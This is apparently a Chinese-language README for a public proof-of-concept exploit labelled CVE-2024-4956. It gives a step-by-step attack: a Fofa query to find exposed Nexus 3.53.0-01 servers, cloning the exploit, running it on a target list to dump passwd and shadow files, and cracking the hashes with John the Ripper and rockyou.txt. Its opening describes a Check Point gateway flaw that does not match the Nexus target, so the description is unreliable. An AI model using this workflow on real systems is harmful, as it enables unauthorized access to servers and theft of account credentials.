攻击者可能能够在连接到互联网并启用 Remote Access VPN 或 Mobile Access Software Blades 后,读取 Check Point Security Gateways 上的某些信息。目前已有可缓解此漏洞的安全修复程序。
了解更多 — CVE-2024-4956
免责声明:本概念验证(POC)仅用于教育和道德测试目的。未经事先双方同意,使用此工具攻击目标是非法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发人员不承担任何责任,也不对由本程序引起的任何滥用或损害负责。
要查找潜在目标,可使用 Fofa(类似于 Shodan.io):
header="Server: Nexus/3.53.0-01 (OSS)"
首先,克隆仓库:
git clone https://github.com/verylazytech/CVE-2024-4956
接下来,选择你的目标,并按以下格式将其添加到 list.txt 文件中:
运行漏洞利用程序:
python3 CVE-2024-4956.py -l list.txt
输出的是找到的 passwd 和 shadow 文件:

现在,在找到 passwd 和 shadow 这两个文件后,你可以尝试使用 JohnTheRipper 破解哈希。运行漏洞利用程序后,你会得到 passwd 和 shadow 两个文件,因此可以将它们合并到一个文件中并尝试破解(我使用了 rockyou.txt,但可以使用任何密码字典):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt